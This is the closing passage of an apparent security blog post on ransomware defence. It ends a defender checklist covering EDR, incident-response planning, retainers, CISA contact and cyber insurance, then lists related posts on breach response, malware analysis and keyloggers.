  • [ ] EDR deployed on all endpoints with ransomware-specific policies enabled
  • [ ] IR plan documented and tested via tabletop exercise at least annually
  • [ ] IR retainer in place (faster than cold-calling vendors during an incident)
  • [ ] CISA relationship established (free IR assistance for critical infrastructure)
  • [ ] Cyber insurance policy reviewed — understand what triggers coverage and what doesn't

The attacker's operational cost for a ransomware deployment is now under $10,000 (IAB access + RaaS subscription + infrastructure). Their expected return is millions. Defenders who understand the kill chain can interrupt it at multiple points — but only if the controls are in place before the call at 3 AM.

Sharetwitterlinkedin

Related Posts

What to Do After a Data Breach: Step-by-Step Response

Your data was exposed in a breach. Here's exactly what to do in the first 24 hours, the first week, and long-term to protect yourself.

Introduction to Malware Analysis

A practical guide to static and dynamic malware analysis — covering PE inspection, sandboxing, strings extraction, and the tools analysts actually use.

Keyloggers: How They Work and How to Detect Them

Keyloggers silently record every keystroke you type. Learn how software and hardware keyloggers work, how to detect them, and how to protect yourself.